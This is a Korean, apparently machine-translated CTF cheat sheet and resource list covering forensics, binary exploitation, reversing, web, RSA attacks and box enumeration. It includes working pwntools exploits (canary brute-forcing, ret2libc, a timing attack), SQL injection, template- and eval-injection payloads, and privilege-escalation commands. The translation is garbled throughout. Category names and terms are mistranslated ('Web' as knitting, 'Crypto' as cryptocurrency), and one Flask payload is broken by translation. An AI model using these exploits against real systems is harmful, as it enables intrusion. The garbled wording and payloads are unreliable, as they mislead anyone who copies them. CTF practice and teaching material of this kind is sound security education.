CTFs

내가 작성한 일부 사이버 CTF에 대한 글/파일

또한 CTF 리소스 목록과 수많은 일반적인 CTF 문제를 다루는 포괄적인 치트 시트 도 포함했습니다.

• 자원

  • YouTube(우리는 비디오 리소스를 좋아합니다)
  • 연습/학습 사이트
    • CTF
    • 일반적인
    • 폰
    • 회전
    • 편물
    • 암호화폐
    • 스마트 계약
    • 구름
    • 침투 테스트

• CTF 치트 시트

  • 법의학/스테가노그래피
    • 일반적인
    • 오디오
    • 영상
    • 동영상
    • 머신 이미지
    • PCap
  • Pwn/바이너리 착취
    • 일반적인
    • 버퍼 오버플로
    • PIE(위치 독립 실행)
    • NX(실행 불가능)
    • ROP(정적으로 컴파일된 바이너리용)
    • 스택 카나리아
    • 포맷 문자열 취약점
    • 쉘코드
    • Libc로 복귀
  • 리버스 엔지니어링
    • SMT 솔버
    • 바이트 단위 확인 반전
    • gef로 문자열 검색하기
  • 편물
    • 퍼징 입력 필드
  • 암호화폐

    • 사이버셰프

    • 일반적인 암호

    • RSA

      • pycryptodome으로 RSA 정보 확보
      • 중국 나머지 정리(p,q,e,c)
      • 구리세공 공격(c,e)
      • 폴라드 공격(n,e,c)
      • 위너 공격(n,e,c)

    • 베이스16, 32, 36, 58, 64, 85, 91, 92

  • 상자
    • 연결 중
    • 열거
    • 권한 승격
    • 리버스 쉘 듣기
    • 리버스 쉘
    • 대화형 셸 가져오기
      • 리눅스
      • 윈도우 / 일반
  • OSINT
  • 기타

• 존 해먼드
  • 예전에는 CTF 영상을 많이 만들었지만 다른 일로 옮겼습니다.
  • 아직도 유용한 영상이 많아요. CTF는 특히 사이버를 처음 접하는 사람들을 가르치는 데 훌륭합니다.
• 라이브 오버플로
  • 사이버에 관한 매우 흥미롭고 심층적인 비디오를 만듭니다.
  • 놀라운 pwn 시리즈가 있습니다
• IppSec
  • 모든 단일 HackTheBox 시스템에 대한 글을 작성합니다.
    • 다양한 해결 방법과 작동 이유에 대해 이야기합니다. 강력히 추천합니다
• 컴퓨터 애호가
  • Numberphile과 같은 사람들이지만 더 멋있습니다. 기본 개념에 대해 정말 초보자 수준의 직관적인 비디오를 만듭니다.
• pwn.college
  • pwn에 대한 수많은 동영상을 보유하고 있는 ASU 교수
  • 안내 과정 자료: https://pwn.college/
  • 수많은 연습 문제: https://dojo.pwn.college/
• Pwn함수
  • Diff 주제에 대한 매우 고품질의 이해하기 쉬운 애니메이션 비디오
  • 주제는 약간 고급이지만 쉽게 이해할 수 있습니다.
• 마틴 칼라일
  • picoCTF 챌린지에 대한 놀라운 글쓰기 비디오를 만듭니다.
• 샘 보운
  • 자신의 웹사이트에 자신의 모든 강의와 강의 자료를 공개하는 CCSF 교수
• UFSIT
  • University of Florida의 사이버 팀(약간 편견이 있지만 이를 위한 더 나은 YouTube 채널 중 하나입니다)
• 진바엘
  • 놀랍도록 직관적인 비디오 글을 작성합니다. picoCTF 2019 전체를 완료했습니다(많은 작업입니다).
• 블랙힐스 정보보안
  • 수많은 교육 콘텐츠를 만드는 보안 회사
  • 보안 주제에 대한 무료 강좌와 웹캐스트를 항상 진행하고 있습니다.
• 스택스매싱
  • 놀라운 리버스 엔지니어링 및 하드웨어 해킹 비디오
  • WannaCry를 리버스 엔지니어링하는 정말 멋진 시리즈가 있습니다.
• 벤 그린버그
  • 다양한 PWN 및 맬웨어 비디오 튜토리얼을 제공하는 GMU 교수
  • 좀 낡았지만 그래도 좋아요
• Georgia Tech의 InfoSecLab
  • pwn에 대한 우수하고 고급 심층 강의
  • 약간의 배경 지식이 필요합니다
• RPISEC
  • RPI 대학 팀 회의
  • 매우 고급이며 약간의 CS 배경 지식이 있다고 가정합니다.
• 매트 브라운
  • 임베디드 보안 침투 테스터
  • IoT 해킹에 대한 초보자 친화적인 동영상을 만듭니다.

다음은 제가 정리한 슬라이드입니다: hackback.zip/presentations

• 피코CTF
  • 수많은 놀라운 연습 과제가 있습니다.
  • 확실히 시작하기 위한 최적의 표준
• UCF
  • 전반적으로 좋지만 훌륭한 pwn 연습
  • 나는 현재 여기에 글을 올리는 작업 중입니다.
• 해커101
  • CTF이지만 침투 테스팅에 조금 더 적합
• CSAW
  • 시간이 90% 감소하고 일반적으로 연결이 전혀 작동하지 않습니다.
  • 그래도 성공하면 좋은 입문 과제가 많이 있습니다.
• CTF101
  • 내가 본 CTF 소개 중 최고 중 하나(gj osiris)
  • 매우 간결하고 초보자에게 친숙함

• HackTheBox
  • OG 박스 사이트
    • 품질을 보장하기 위해 상자를 선별했습니다.
  • 이제 CTF 스타일의 문제가 있습니다.
  • 이제 학습을 시작할 수 있는 과정이 있습니다.
• TryHackMe
  • HackTheBox보다 약간 더 쉬운 상자
  • 단계별 과제
  • 이제 주제를 안내하는 "학습 경로"가 있습니다.
• CybersecLabs
  • 훌륭한 상자 모음
  • CTF 관련 내용이 있습니다.
• VulnHub
  • 직접 배포해야 하는 취약한 가상 머신이 있음
  • 종류는 많은데 좋은걸 찾기가 힘드네요

• pwnable.kr
  • 다양한 난이도의 도전 과제
• pwnable.tw
  • pwnable.kr보다 어렵습니다.
  • 문제를 해결하면 기록이 남습니다.
• pwnable.xyz
  • 더 많은 PWN 챌린지
  • 문제를 해결하면 기록이 남습니다.
  • 모든 문제를 해결한 후 자신만의 과제를 업로드할 수 있습니다.
• 폰 도장
  • 내 생각에 최고의 pwn 챌린지 모음
  • 수행 방법을 알려주는 슬라이드로 백업하고 도움이 필요한 경우 의견을 교환합니다.
• 악몽
  • C 바이너리를 위한 최고의 표준
  • 몇 가지 실수/오타가 있지만 전체적으로 훌륭합니다.
• 폰 노트
  • 온라인에서 임의의 사람이 남긴 메모
  • 매우 표면적인 수준이지만 모든 것에 대한 좋은 소개입니다.
• 보안 여름 학교
  • 부쿠레슈티 대학교 보안 코스
  • 매우 초보자 친화적인 설명
• RPISEC MBE
  • RPI의 최신 바이너리 활용 과정
  • 실습을 위한 충분한 양의 실험실/프로젝트 및 일부 (약간 날짜가 있는) 강의가 있습니다.
• 어떻게2힙
  • ASU CTF 팀이 만든 Heap Exploitation 시리즈
  • 익스플로잇 작동 방식을 보여주는 매우 멋진 디버거 기능이 포함되어 있습니다.
• ROPE엠포리움
  • 반환 지향 프로그래밍을 가르치는 모든 주요 아키텍처의 일련의 과제
  • 매우 높은 품질. 가장 기본적인 기술부터 가장 진보된 기술까지 가르칩니다.
  • 현재 여기에 내 글을 추가하고 있습니다.
• Phoenix 익스플로잇 교육
  • 난이도에 따라 정렬된 수많은 바이너리 활용 문제
  • 소스가 포함되어 있으며 모든 바이너리가 포함된 VM이 함께 제공됩니다.

• Challenge.re
  • 과제가 너무 많아요 0_0
  • 수많은 다양성
• 리버싱.kr
• crackmes.one
  • 수많은 CTF(Crackme) 스타일 과제
• 악성 코드 유니콘 워크샵
  • 리버스 엔지니어링 및 악성코드 분석에 관한 무료 워크숍

• websec.fr
  • 다양한 난이도의 다양한 웹 챌린지
• webhacking.kr
  • 많은 좋은 웹 챌린지 아카이브를 보유하고 있습니다.
• 웹 애플리케이션 보안
  • 오픈 소스 CCSF 과정
• OWASP 주스 가게
  • 침투 테스트에 매우 적합하지만 CTF에서 웹을 탐색하는 데 유용합니다.
  • 총 100개 이상의 취약점/챌린지
• 포트스위거
  • 웹 해킹을 이해하기 위한 최고의 표준
  • 수많은 놀라운 도전과 설명
• DVWA
  • 침투 테스트에 매우 적합하지만 CTF에서 웹을 탐색하는 데 유용합니다.
• bWAPP
  • 침투 테스트에 매우 적합하지만 CTF에서 웹을 탐색하는 데 유용합니다.
• CTF 챌린지
  • 최대한 현실적으로 제작된 Adam Langley의 웹 챌린지 모음입니다.
  • 버그 바운티 경험을 얻는 데 좋습니다.

• 크립토핵
  • 나는 현재 여기에 글을 올리는 작업 중입니다.
• 암호화폐
  • OG 암호화폐 챌린지 사이트.
• 암호화폐CTF
  • 연간 암호화 CTF. 이전 연도는 20{19,20,21,22,23,24}.cr.yp.toc.tf 에서 액세스할 수 있습니다.

• 에테르를 포착하세요

• CloudFoxable
  • Cloudfox를 사용하여 악용될 취약한 환경을 설정하는 과정을 안내합니다.
• 결함.클라우드
  • S3, EC2 및 Lambda에서 비밀을 찾는 것과 관련된 무료 챌린지

• 해커101
• 해킹
• 익스플로잇 개발
  • 오픈 소스 CCSF 과정
• 보안 소개
  • Deian Stefan이 가르치는 UC San Diego 과정
  • 기본 pwn 및 암호화를 다룹니다.
• Active Directory 치트 시트
• WADCom
  • Windows/AD 환경을 위한 대화형 치트 시트
• 롤바스
  • Windows "Living off the land" 바이너리, 스크립트 및 활용용 라이브러리에 대한 대화형 치트 시트
• GTFOBins
  • Linux "Living off the land" 기술에 대한 대화형 치트 시트입니다.

• 아페리솔브
  • 다른 Stego 도구를 자동으로 실행하는 도구
• 다양한 유형의 과제에 대한 John Hammond의 정말 좋은 리소스입니다.
  • https://github.com/JohnHammond/ctf-katana
• 과제를 만들고 해결하기 위한 또 다른 훌륭한 치트 시트:
  • https://github.com/apsdehal/awesome-ctf/blob/master/README.md
• 파일
  • file <file.xyz>
  • 파일 유형을 결정합니다.
• 스테그하이드
  • steghide extract -sf <file.xyz>
  • 포함된 파일을 추출합니다.
• 스테그시크
  • stegseek <file> <password list>
  • 단어 목록을 사용하여 포함된 파일을 추출합니다.
  • 엄청 엄청 빠르다
• 빈워크
  • binwalk -M --dd=".*" <file.xyz>
  • 포함된 파일을 추출합니다.
• 엑시프툴
  • exiftool <file.xyz>
  • 메타데이터를 읽습니다.
• 문자열
  • strings <file.xyz>
  • 파일에서 인쇄 가능한 모든 문자를 찾습니다.
• 16진수 편집
  • hexedit <file.xyz>
  • 일부 이미지를 열려면 파일 서명을 변경해야 할 수도 있습니다.
  • 공통 파일 서명 목록
• Ghex(GUI가 포함된 또 다른 16진수 편집기. 특정 바이트로 이동해야 하는 경우 유용함)
  • ghex <file.xyz>
• docx 파일은 컨테이너이므로 압축을 풀어 숨겨진 콘텐츠를 찾을 수 있습니다.
  • unzip <file.docx>
• Grep - grep을 사용하여 재귀적으로 플래그를 찾는 좋은 방법입니다.
  • grep -r --text 'picoCTF{.*}'
  • egrep -r --text 'picoCTF{.*?}
  • 찾고 있는 플래그의 시작 부분으로 'picoCTF'를 변경할 수 있습니다.
• Ltrace - 프로그램을 실행할 때 코드가 수행하는 작업을 확인할 수 있습니다.
  • ltrace ./<file>
  • ltrace -s 100 ./<file>
    • Ltrace는 매우 긴 문자열을 단축합니다. -s를 사용하면 ltrace가 표시하는 문자 수를 늘릴 수 있습니다. 큰 문자열이 있는 strcmp를 볼 때 유용합니다.

• 팩스기 오디오:

  • 예
  • 디코더

• SSTV(느린 스캔 TV) 오디오(달 물건)

  • 예
  • 디코더
  • 대체 디코더
  • 다음 qsstv 설정을 사용하십시오.

  

• 스펙트로그램 이미지

  • 디코더

• 피치, 속도, 방향 변경...

  • 피치, 속도, 튜닝
  • 뒤집다

• DTMF(이중 톤 다중 주파수) 전화 키

  • multimon-ng -a DTMF -t wav <file.wav>
    • 문자를 멀티탭할 수 있다는 점을 명심하세요.
      • 숫자를 텍스트로 디코딩할 수 있습니다.

• 카세트테이프

  • 예
  • 디코더(파일 탭을 위한 WAV)

• 모스 부호

  • 디코더

• 스테그솔브

  • 비트를 통해 전환

• 맨 먼저

  • 이미지 추출을 위한 특수 도구
  • 깨진 이미지를 합치는 데 사용할 수 있습니다(예: pcap).

• 디픽스

  • 텍스트 픽셀화 해제

• 포토샵으로 처리한 것이 있는지 확인(하이라이트 확인)

  • https://29a.ch/photo-forensics/#오류수준-분석

• zsteg

  • LSB 디코더

• 제스테그

  • JPEG 스테가노그래피 솔버

• 픽스리커버리

  • 지금까지 내가 찾은 가장 효과적인 png 복구 도구(워터마크에 신경 쓰지 않는 한)
  • 포토피아도 아주 잘 작동해요

• crc32fix

  • 체크섬을 기준으로 png의 높이와 너비를 수정합니다.

• PCRT

  • png 머리글 및 바닥글 정보 수정

• png-crc-수정

  • png 체크섬 수정

• png체크

  • png에 오류가 있는지 확인
  • png체크

• 파일 복구 중
  • photorec <file.bin>
• 이미지를 가상 머신으로 마운트할 수 있습니다.
  • https://habr.com/en/post/444940/
• .img 파일을 마운트합니다:
  • binwalk -M --dd=".*" <fileName>
  • 출력 시 file 실행하고 Linux 파일 시스템 파일을 선택합니다.
  • losetup /dev/loop<freeLoopNumber> <fileSystemFile>

• tcpflow를 사용하여 데이터 추출
  • tcpflow -r <file.pcap>
• WireShark로 데이터 추출
  • 파일 → 개체 내보내기 → 선택

• 이에 대해서는 대신 내 LearnPwn 저장소를 살펴보는 것이 좋습니다. 이 치트시트는 제가 pwn에 대해 많이 알기 전에 만들어졌기 때문입니다.
  • 그러나 여기에 있는 내용을 수정하여 몇 가지 메모를 포함했습니다.

• ELF의 보안을 확인하세요
  • checksec <binary>
  • rabin2 -I <binary>
• PE의 보안을 확인하세요
  • 바이너리 보안 검사
  • binary-security-check <bin>.exe
• seccomp bpf를 확인하세요
  • seccomp 도구
  • seccomp-tools dump ./<binary>
• 상징을 봐
  • readelf -s <binary>
• 문자열을 봐
  • rabin2 -z <binary>
• 주소를 바이트로 팩
  • 리틀 엔디안(32비트용)
    • python -c "import pwn; print(pwn.p32(<intAddr>))
  • 빅 엔디안(64비트용)
    • python -c "import pwn; print(pwn.p64(<intAddr>))
  • pwntools는 올바른 엔디안으로 주소를 자동으로 압축합니다.

• /bin/sh 셸을 가져와야 하고 작동한다고 확신하지만 프로그램이 종료되는 경우 다음 방법을 사용하세요.
  • ( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>
  • pwntools는 process.interactive() 사용하여 이 작업을 수행합니다.

• 임의의 값을 결정
  • 페이로드를 생성하기 위한 pwn cyclic <numChars>
  • dmesg | tail | grep segfault 오류가 발생한 위치를 확인합니다.
  • pwn cyclic -l 0x<errorLocation> 제어 명령 포인터에 대한 무작위 오프셋 보기
  • 예

• ROP(반환지향 프로그래밍)을 사용하여 문제를 해결할 수 있습니다.

• ROP가젯
  • 가젯 보기 및 자동으로 ropchain 생성
  • ROPgadget --ropchain --binary <binary>
    • 그런 다음 코드 시작 부분에 패딩을 추가하고(버퍼와 반환 주소의 차이에 따라) 코드를 실행하여 셸을 얻을 수 있습니다.
    • 데모
• 로퍼

디버거에서 스택 카나리아 찾기

• 스택 카나리아는 버퍼 오버플로로 인해 덮어쓸 수 있는 EIP/RIP(명령 포인터) 앞에 배치되는 값입니다. 기본적으로 스택을 원래와 다른 것으로 덮어쓰면 프로그램에서 오류가 발생합니다. 우리의 목표는 원래 스택을 찾아서 오버플로될 때 프로그램이 정상적으로 실행되는 것입니다.
• 스택 카나리아는 gs 또는 fs (각각 32비트 및 64비트)에서 가져옵니다.
  • 디스어셈블리에서 무언가를 읽기 전에 다음과 유사한 줄을 볼 수 있습니다.

   0x000000000000121a <+4>: sub    rsp,0x30
   0x000000000000121e <+8>: mov    rax,QWORD PTR fs:0x28
   0x0000000000001227 <+17>:mov    QWORD PTR [rbp-0x8],rax
   0x000000000000122b <+21>:xor    eax,eax

• 여기서 스택 카나리아는 오프셋 +8의 rax 로 이동됩니다.
  • 따라서 다음 오프셋에서 중단하고 rax( ir rax )에 무엇이 있는지 확인하여 현재 카나리아가 무엇인지 확인하세요.

정적 카나리아

• 카나리아는 프로그래머가 수동으로 구현했거나(일부 소개 pwn 문제의 경우) 프로그램을 포크할 수 있는 경우에만 정적입니다.
  • 바이너리를 포크하면 포크된 바이너리에도 동일한 카나리아가 있으므로 해당 바이너리에 대해 바이트 단위로 무차별 공격을 가할 수 있습니다.

추가의

• 스택 카나리아를 부적절하게 덮어쓰면 __stack_chk_fail 이 호출됩니다.

  • 카나리아를 누출할 수 없으면 GOT 테이블을 수정하여 호출되지 않도록 할 수도 있습니다.

• 카나리아는 현재 스택의 TLS 구조에 저장되며 security_init 에 의해 초기화됩니다.

  • 실제 카나리아 값을 덮어쓸 수 있다면 오버플로하기로 결정한 값과 동일하게 설정할 수 있습니다.

• 정적 4바이트 카나리아를 무차별 대입하는 간단한 스크립트:

 #!/bin/python3
from pwn import *

#This program is the buffer_overflow_3 in picoCTF 2018
elf = ELF ( './vuln' )

# Note that it's probably better to use the chr() function too to get special characters and other symbols and letters.
# But this canary was pretty simple :)
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

canary = ''
# Here we are bruteforcing a canary 4 bytes long
for i in range ( 1 , 5 ):
    for letter in range ( 0 , len ( alphabet )):  # We will go through each letter/number in the string 'alphabet'
        p = elf . process ()  # We start the process
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( str ( 32 + i ))  # In this program, we had to specify how many bytes we were gonna send.
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( 'A' * 32 + canary + alphabet [ letter ])  # We send the 32 A's to overflow, and then the canary we already have + our guess
        prompt = p . recv (). decode ( 'utf-8' )
        if "Stack" not in prompt :  # The program prints "Stack smashed [...]" if we get wrongfully write the canary.
            canary += alphabet [ letter ]  # If it doesn't print that, we got part of our canary :)
            break  # Move on to the next canary letter/number

print ( "The canary is: " + canary )

• "printf(buf)" 또는 이와 유사한 내용이 표시되면 어떻게 해야 하는지 표 2를 참조하세요.
  • https://owasp.org/www-community/attacks/Format_string_attack
• picoCTF 2018에서 'echooo' 챌린지를 하는 John Hammond를 보는 것을 적극 권장합니다.
• 때로는 '%s %s %s %s %s %s'와 같이 스택에서 문자열만 인쇄하려고 하면 스택의 모든 항목이 문자열이 아니기 때문에 오류가 발생할 수 있습니다.
• 대신 '%x %x %x %x %x %s'를 수행하여 이를 최소화해 보십시오.
• 입력하는 %x 및 %s 수를 지속적으로 늘리는 대신 매개변수를 전달하여 더 쉽게 만들 수 있습니다.
  • %1$s - 스택의 첫 번째 값(내가 이해한 바에 따르면 버퍼 바로 옆에 있는 값)을 문자열로 인쇄합니다.
  • %2$s - 두 번째 값을 문자열로 인쇄하고 아이디어를 얻습니다.
  • 단일 라이너 루프를 사용하여 스택을 누출하여 플래그를 찾을 수 있습니다. 다음 값으로 이동하려면 ^C(CTRL + C)를 누르세요.
    • for i in {1..100}; do echo "%$i$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done
• 다양한 크기 매개변수를 사용하여 누출 정도를 제어할 수 있습니다.
  • %hhx 1바이트를 누출합니다(int 크기의 절반).
  • %hx 2바이트 누수(int 크기의 절반)
  • %x 4바이트 누출(int 크기)
  • %lx 8바이트 누출(긴 크기)
• fstring vuln 및 %n을 사용하여 스택을 수정하는 방법에 대한 매우 좋은 비디오:
  • https://www.youtube.com/watch?v=gzLPVkZbaPA&ab_channel=MartinCarlisle

• 다양한 쉘코드를 찾을 수 있는 좋은 웹사이트:
  • http://shell-storm.org/shellcode/

• system() 라이브러리 함수를 호출하기 위해 EIP를 덮어쓰고 이것이 실행해야 하는 것(이 예에서는 "/bin/sh"가 포함된 버퍼)도 전달합니다.

• 좋은 설명:

  • https://www.youtube.com/watch?v=FvQYGAM1X9U&ab_channel=NPTEL-NOCIITM

• 좋은 예(3:22:44로 이동):

  • https://www.youtube.com/watch?v=uIkxsBgkpj8&t=13257s&ab_channel=freeCodeCamp.org
  • https://www.youtube.com/watch?v=NCLUm8geskU&ab_channel=BenGreenberg

• execve("/bin/sh")에 대한 주소 가져오기

  • one_gadget <libc file>

• libc 파일과 위치를 이미 알고 있는 경우(즉, 유출할 필요가 없습니다...)

 #!/bin/python3

from pwn import *
import os

binaryName = 'ret2libc1'

# get the address of libc file with ldd
libc_loc = os . popen ( f'ldd { binaryName } ' ). read (). split ( ' n ' )[ 1 ]. strip (). split ()[ 2 ]

# use one_gadget to see where execve is in that libc file
one_gadget_libc_execve_out = [ int ( i . split ()[ 0 ], 16 ) for i in os . popen ( f'one_gadget { libc_loc } ' ). read (). split ( " n " ) if "execve" in i ]

# pick one of the suitable addresses
libc_execve_address = one_gadget_libc_execve_out [ 1 ]

p = process ( f'./ { binaryName } ' )
e = ELF ( f'./ { binaryName } ' )
l = ELF ( libc_loc )

# get the address of printf from the binary output
printf_loc = int ( p . recvuntil ( ' n ' ). rstrip (), 16 )

# get the address of printf from libc
printf_libc = l . sym [ 'printf' ]

# calculate the base address of libc
libc_base_address = printf_loc - printf_libc

# generate payload

# 0x17 is from gdb analysis of offset from input to return address
offset = 0x17

payload = b"A" * offset
payload += p64 ( libc_base_address + libc_execve_address )

# send the payload
p . sendline ( payload )

# enter in interactive so we can use the shell created from our execve payload
p . interactive ()

멋진 가이드: https://opensource.com/article/20/4/linux-binary-analytic

• 기드라
  • 매우 유용한 디컴파일러
• dotPeek 또는 dnSpy
  • .NET 실행 파일 디컴파일
• jadx 및 jadx-gui
  • APK 디컴파일
• 개발자 도구 영역
  • 온라인으로 자바 디컴파일
• 퀼트플라워
  • 고급 터미널 기반 Java 디컴파일러
• apktool
  • APK 디컴파일
  • apktool d *.apk
• gdb
  • 바이너리 분석
  • peda(기능 향상을 위한 확장)
  • gef (pwner용 gdb 확장자)
• 레이더2
  • 바이너리 분석
• 풀솜
  • 스테로이드에 대한 strings . 정적 분석을 사용하여 문자열을 찾고 계산합니다.

• 분노 (파이썬)
  • 문서
  • 지도 시간
• z3
  • 지도 시간

https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html

• 시간 기반 공격을 사용하는 챌린지를 위해 제가 만든 버전은 다음과 같습니다.
  • 무작위성을 설명하기 위해 몇 번 실행해야 할 수도 있습니다.

 #!/bin/python3

from pwn import *
import string

keyLen = 8
binaryName = 'binary'

context . log_level = 'error'

s = ''
print ( "*" * keyLen )
for chars in range ( keyLen ):
    a = []
    for i in string . printable :
        p = process ( f'perf stat -x, -e cpu-clock ./ { binaryName } ' . split ())
        p . readline ()
        currPass = s + i + '0' * ( keyLen - chars - 1 )
        # print(currPass)
        p . sendline ( currPass . encode ())
        p . readline ()
        p . readline ()
        p . readline ()
        info = p . readall (). split ( b',' )[ 0 ]
        p . close ()
        try :
            a . append (( float ( info ), i ))
        except :
            pass
        # print(float(info), i)
    a . sort ( key = lambda x : x [ 0 ])
    s += str ( a [ - 1 ][ 1 ])
    print ( s + "*" * ( keyLen - len ( s )))
    # print(sorted(a, key = lambda x: x[0]))

p = process ( f'./ { binaryName } ' )
p . sendline ( s . encode ())
p . interactive ()

• 플래그가 변수로 읽히거나 어느 시점에서 등록되는 경우 이동한 후 중단하고 grep <string> 실행하면 gef가 자동으로 검색 패턴과 일치하는 문자열을 표시합니다.

• 닛토(허용되는 경우)
  • 자동으로 취약점을 찾습니다
• 고버스터(허용되는 경우)
  • 무차별 대입 디렉터리 및 파일
• 히드라(허용되는 경우)
  • 다양한 서비스에 대한 무차별 로그인
• BurpSuite
  • 웹 요청을 가로채서 수정할 수 있도록 허용합니다.
• 와이어샤크
  • 실시간 네트워크 트래픽 및 pcap 파일 분석
• PHP 리버스 쉘
  • 파일을 업로드할 수 있는 웹사이트에 유용합니다.
  • 이 파일이 작동하려면 서버에서 실행되어야 합니다.
• WPScan
  • WordPress 웹사이트 스캔
  • 최상의 결과를 얻으려면 wpscan --url <site> --plugins-detection mixed -e api 키와 함께 사용하세요.
• jwt
  • base64로 인코딩된 json(및 jwt 토큰)이 "ey"로 시작하므로 JWT 토큰을 식별할 수 있습니다.
  • 이 사이트는 JSON 웹 토큰을 디코딩합니다.
  • JSON 웹 토큰의 비밀을 해독하여 자신의 토큰을 수정하고 서명할 수 있습니다.
    • echo <token> > jwt.txt
    • john jwt.txt
• SQL 주입
  • sqlmap
    • sqlmap --forms --dump-all -u <url>
    • SQL 주입 프로세스를 자동화합니다.
  • 기본 SQL 주입
    • 로그인 양식에 'OR 1=1-- 입력하세요.
    • 서버에서 이는 SELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = '' 로 평가됩니다.
    • 1=1 true로 평가되며 이는 OR 문을 충족하고 쿼리의 나머지 부분은 -- 로 주석 처리됩니다.
• 페이로드AllTheThings
  • 페이로드가 많은 웹 공격을 위한 훌륭한 리소스
• 템플릿 주입
  • 티플맵
    • 자동화된 서버 측 템플릿 삽입
  • 진자주사
    • {{ config.items() }}
  • 플라스크 주입
    • {{ 구성 }}
  • Python eval() 함수
    • __import__.('subprocess').getoutput('<command>')
      • 작동하지 않으면 괄호를 바꿔보세요
    • __import__.('subprocess').getoutput('ls').split('\n')
      • 시스템의 파일 나열
  • 더 많은 파이썬 주입
• 크로스 사이트 스크립팅
  • CSP 평가자
    • Google의 콘텐츠 보안 정책 평가자

• ㅋㅋㅋ
  • 요청을 입력 필드에 복사하고 매개변수를 "FUZZ"로 바꿉니다.
    • ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all
    • -fs 사용하여 크기 필터링

• 사이버셰프
  • 다양한 암호화 작업을 수행합니다.

암호 탐지기

• 해시드
  • 해시 유형을 감지하는 명령줄 유틸리티

• 시저스 사이퍼
• 비제네르 암호

 #### Solver using custom table
cipherText = ""
plainText = ""
flagCipherText = ""
tableFile = ""

with open ( cipherText ) as fin :
    cipher = fin . readline (). rstrip ()

with open ( plainText ) as fin :
    plain = fin . readline (). rstrip ()

with open ( flagCipherText ) as fin :
    flag = fin . readline (). rstrip ()

with open ( tableFile ) as fin :
    table = [ i . rstrip (). split () for i in fin . readlines ()]

table [ 0 ]. insert ( 0 , "" ) # might have to modify this part.
            # just a 2d array with the lookup table
            # should still work if the table is slightly off, but the key will be wrong
key = ""
for i , c in enumerate ( plain [ 0 : 100 ]):
  col = table [ 0 ]. index ( c )
  for row in range ( len ( table )):
    if table [ row ][ col ] == cipher [ i ]:
      key += table [ row ][ 0 ]
      break

print ( key )

dec_flag = ""
for i , c in enumerate ( flag [: - 1 ]):
  col = table [ 0 ]. index ( key [ i ])
  for row in range ( len ( table )):
    if table [ row ][ col ] == flag [ i ]:
      dec_flag += table [ row ][ 0 ]
      break

print ( dec_flag )

• 대체 암호
• 로트13
• 키가 있는 시저스 암호

 from Crypto . PublicKey import RSA

keyName = "example.pem"

with open ( keyName , 'r' ) as f :
    key = RSA . import_key ( f . read ())

print ( key )

# You can also get individual parts of the RSA key 
# (sometimes not all of these)
print ( key . p )
print ( key . q )
print ( key . n )
print ( key . e )
print ( key . d )
print ( key . u )

# public keys have n and e 

• 숫자 n 인수분해할 수 있을 때 이것을 사용하세요

  • 잘못된 구현에는 두 가지 이상의 주요 요소가 있습니다.
  • 증거

• 오래된

 def egcd ( a , b ):
    if a == 0 :
        return ( b , 0 , 1 )
    g , y , x = egcd ( b % a , a )
    return ( g , x - ( b // a ) * y , y )

def modinv ( a , m ):
    g , x , y = egcd ( a , m )
    if g != 1 :
        raise Exception ( 'No modular inverse' )
    return x % m

p = 
q = 
e = 
c = 

n = p * q # use factordb command or website to find factors

phi = ( p - 1 ) * ( q - 1 ) # phi is simply the product of (factor_1-1) * ... * (factor_n -1)

d = modinv ( e , phi ) # private key

# print(d)

m = pow ( c , d , n ) # decrypted plaintext message in long integer form

thing = hex ( m )[ 2 :] # ascii without extra stuff at the start (0x)
print ( bytes . fromhex ( thing ). decode ( 'ascii' ))

• 새로운

 #!/bin/python3
from Crypto . Util . number import *
from factordb . factordb import FactorDB

# ints:
n =    
e =  
c =  

f = FactorDB ( n )
f . connect ()
factors = f . get_factor_list ()

phi = 1
for i in factors :
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• 인수와 오일러의 총체(phi)를 제공하는 웹사이트
  • https://www.alpertron.com.ar/ECM.HTM

• 일반적으로 지수가 매우 작은 경우(e <= 5) 사용됩니다.
  • 증거

 from Crypto . Util . number import *
def nth_root ( radicand , index ):
    lo = 1
    hi = radicand
    while hi - lo > 1 :
        mid = ( lo + hi ) // 2
        if mid ** index > radicand :
            hi = mid
        else :
            lo = mid

    if lo ** index == radicand :
        return lo
    elif hi ** index == radicand :
        return hi
    else :
        return - 1

c = 
e = 

plaintext = long_to_bytes ( nth_root ( c , e ))
print ( plaintext . decode ( "UTF-8" ))

• (B)매끄러운 경우 소수의 곱을 쉽게 인수분해할 수 있게 만드는 폴라드(Pollard)의 인수분해 방법을 기반으로 합니다.
  • p-1 | B! q - 1 B 보다 큰 인수를 갖습니다.

 from Crypto . Util . number import *
from math import gcd

n = 
c = 
e = 

def pollard ( n ):
    a = 2
    b = 2
    while True :
        a = pow ( a , b , n )
        d = gcd ( a - 1 , n )
        if 1 < d < n : 
            return d
        b += 1

p = pollard ( n )
q = n // p

phi = 1
for i in [ p , q ]:
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• d가 너무 작을 때(또는 e가 너무 클 때) 사용
  • 이 파이썬 모듈을 사용하여
  • 증거

 from Crypto . Util . number import *
import owiener

n = 
e = 
c = 

d = owiener . attack ( e , n )
m = pow ( c , d , n )

flag = long_to_bytes ( m )
print ( flag )

https://github.com/mufeedvh/basecrack

• SSH
  • ssh <username>@<ip>
  • ssh <username>@<ip> -i <private key file>
  • SSH를 로컬에서 파일 시스템으로 마운트합니다.
    • sshfs -p <port> <user>@<ip>: <mount_directory>
  • 알려진 호스트
    • ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>
• 넷캣
  • nc <ip> <port>

• 기계 발견

  • netdiscover

• 머신 포트 스캐닝

  • nmap -sC -sV <ip>

• 리눅스 열거

  • enum4linux <ip>

• SMB 열거

  • smbmap -H <ip>

• SMB 공유에 연결

  • smbclient //<ip>/<share>

• 린페아
  • ./linpeas.sh
  • 권한 상승 벡터를 자동으로 찾습니다.
• 루트로 실행할 수 있는 명령 나열
  • sudo -l
